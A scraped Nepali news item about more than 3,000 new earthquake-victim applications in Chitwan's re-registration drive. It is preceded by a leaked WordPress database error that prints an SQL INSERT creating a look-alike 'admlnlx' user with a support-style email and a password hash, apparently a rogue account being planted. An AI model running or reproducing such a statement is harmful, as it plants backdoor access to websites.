WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgRvFyhpOhQlswyOnBOhP2HCsvfNtj/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 14:48:16', '', 'admlnlx', 'admlnlx')
चितवन,पुस ८-
चितवनमा ३ हजार भन्दा बढी भूकम्प पीडित थपिएका छन्। हालै सुरु भएको भूकम्प पीडितको पुन लगत संकलनका क्रममा ३ हजार ३ जना भुकम्प पीडितको निवेदन थपिएको हो। सामान्य क्षति सहित गरी यसअघि चितवनमा १५ हजार ७ सय ४९ भूकम्प पीडितको तथ्यांक आएको थियो। त्यसमा पूर्ण क्षति भएका घरको संख्या ३ हजार ७ सय २५ रहेको थियो। तर, अहिले भुकम्प पीडितहरुको निवेदन थपिएको छ।
चितवनका स्थानीय विकास अधिकारी तथा जिल्ला विपद व्यवस्थापन समितिका सदस्य सचिव श्रवणकुमार पोखरेलले गाउँगाउँमा नगरपालिका र गाविसमार्फत गरिएको पुनलगत संकलनको क्रममा भुकम्प पीडितले क्षतीको विवरण पेश गरेको जानकारी दिए। विवरणको इन्जिनियर सहितको टोलीले घरघरमै पुगेर पुन मुल्यांकन गर्ने र भूकम्प पीडित हो की होइन भनेर पहिचान गर्ने जिल्ला तथ्यांक कार्यालय चितवनका प्रमुख तथा विवरण संकलन कार्यक्रमका संयोजक जीवनाथ आचार्यले बताए।